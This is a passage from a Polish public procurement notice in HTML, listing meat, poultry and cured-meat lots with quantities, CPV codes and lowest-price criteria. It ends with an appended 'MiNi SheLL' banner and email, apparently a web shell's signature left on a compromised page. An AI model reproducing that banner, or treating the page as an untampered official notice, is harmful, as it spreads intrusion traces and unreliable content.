10. Od szynki, kg	200;
11. Wołowina bitkowa, kg	30;
12. Antrykot, kg	100;
13. Pachwina wędzona, kg	10;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET NR 7 - DRÓB..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ćwiartka kurczaka 0,45kg,	kg	1200;
2. Filet drobiowy, kg	200;
3. Porcje rosołowe, kg	300;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET NR 8 - WĘDLINY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Wędlina grubo rozdrobniona, wyprodukowana z mięsa wieprzowego peklowanego. Batony w osłonkach białkowych, klipsowane. Powierzchnia batonu gładka od jasnobrązowej do ciemnobrązowej, kształt właściwy dla użytej osłonki. Na przekroju surowce równomiernie rozmieszczone. Barwa na przekroju charakterystyczna dla użytych surowców peklowanych; mięsa od bladoróżowej do ciemnoczerwonej; tłuszczu od kremowej do białej. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego oraz użytych przypraw. (Krakowska lub równoważna), kg	200;
2. Wędlina grubo rozdrobniona, wyprodukowana z mięsa wieprzowego peklowanego. Batony w osłonkach białkowych, kliprowane, cienki batorn. Powierzchnia batonu gładka od jasnobrązowej do ciemnobrązowej, kształt właściwy dla użytej osłonki. Na przekroju surowce równomiernie rozmieszczone. Barwa na przekroju charakterystyczna dla użytych surowców peklowanych; mięsa od bladoróżowej do ciemnoczerwonej; tłuszczu od kremowej do białej. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego oraz użytych przypraw (Rawska lub równoważna), kg	160;
3. Wyrób średnio rozdrobniony z mięsa wieprzowego poddany parzeniu w osłonce barierowej o średnicy 73 mm., wyrób chudy, wyczuwalne przyprawy. Trwałość 14 dni. (Zielonogórska lub równoważna), kg	120;
4. Łopatka prasowana w bloku -od 3-5 kg niedopuszczalny jest smak i zapach świadczące o nieświeżości produktu. Konsystencja ścisła, nierozpadająca się, barwa w przekroju jasnoróżowa, kiełbasa średnio rozdrobniona wieprzowa, wędzona parzona. (Łopatkowa lub równoważna), kg	120;
5. Wędlina grubo rozdrobniona, wyprodukowana z mięsa wieprzowego peklowanego. Batony w osłonkach białkowych, przewiązanych przędzą wzdłuż i w poprzek, końce osłonek związane przędzą. Powierzchnia batonu gładka, barwy od jasnobrązowej do ciemnobrązowej, kształt właściwy dla użytej osłonki. Barwa na przekroju charakterystyczna dla użytych mięśni wieprzowych peklowanych. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego oraz użytych przypraw. (Szynkówka lub równoważna), kg	200;
6. Produkty parzone, wyprodukowane z mięsa wieprzowego peklowanego z dodatkiem przypraw i surowców uzupełniających. Batony w osłonkach sztucznych, kliprowane. Powierzchnia batonu gładka, kształt właściwy dla użytej osłonki i formy. Barwa na przekroju charakterystyczna dla użytego mięsa peklowanego; mięso od bladoróżowej do ciemnoczerwonej. Smak i zapach charakterystyczny dla wędliny parzonej z mięsa wieprzowego oraz dodanych przypraw i surowców uzupełniających. (Dębicka lub równoważna), kg	100;
7. Wyrób z mięsa wieprzowego grubo rozdrobnionego w białkowej osłonce o średnicy 65 mm. Batony o długości 30 cm poddane procesowi wędzenia i parzenia. Trwałość 14 dni. (Śniadaniowa lub równoważna)	 kg	120;
8. Wędlina średnio rozdrobniona, wyprodukowana z peklowanego mięsa wieprzowego i wołowego. Batony w osłonkach białkowych, klipsowane. Powierzchnia batonu gładka, kształt właściwy dla użytej osłonki. Na przekroju surowce równomiernie rozmieszczone. Barwa na przekroju charakterystyczna dla użytych surowców peklowanych; mięsa od bladoróżowej do ciemnoczerwonej. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego oraz użytych przypraw i dodatków. (Piwna lub równoważna), kg	70;
9. Kiełbasa wieprzowa, średnio rozdrobniona, parzona, drobno rozdrobniona produkowana ze znakomitego mięsa wieprzowego z dodatkiem naturalnych przypraw ( Klubowa lub równoważna), kg	20;
10. Kiełbasa średnio rozdrobniona, wędzona, parzona, otrzymana z mięsa wieprzowego i wołowego, peklowanego. Batony w jelitach wieprzowych cienkich, odkręcane w odcinki - krótkie. Powierzchnia batonu od jasnobrązowej do ciemnobrązowej, osłonka pomarszczona. Na przekroju surowce równomiernie rozłożone. Barwa na przekroju charakterystyczna dla użytych surowców peklowanych; mięsa od bladoróżowej do ciemnoczerwonej; tłuszczu od kremowej do białej. Smak i zapach charakterystyczny dla kiełbasy wędzonej, parzonej z mięsa wieprzowego i wołowego oraz użytych przypraw. (Domowa lub równoważna ), kg	20;
11. Parówka wieprzowa cienka-paluszek, kg	150;
12. Pieczeń wieprzowa, kg	100;
13. Parówka drobiowa, kg	100;
14. Filet drobiowy, złocisty - wędlina, kg	50;
15. Szynka konserwowa, kg	50;
16. Kaszanka, kg	50;
17. Wędzonka wieprzowa parzona. Wędzonka otrzymana z części szynki wieprzowej peklowanej bez kości, wędzona, parzona. Wędzonka osznurowana wzdłuż i w poprzek; barwa mięsa różowa do blado czerwonej, barwa tłuszczu biała do jasno żółtej, częściowo pokryta warstewką tłuszczu. (Ogonówka lub równoważny), kg 20;
18. Szynka gotowana, kg	10;
19. Pieczeń rzymska, kg	50;
20. Mortadela, kg	100;
21. Wędlina drobiowa, kg	150;
22. Polędwica miodowa, kg	50;
23. Polędwica drobiowa, kg	50;
24. Kabanosy wieprzowe, kg	50;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com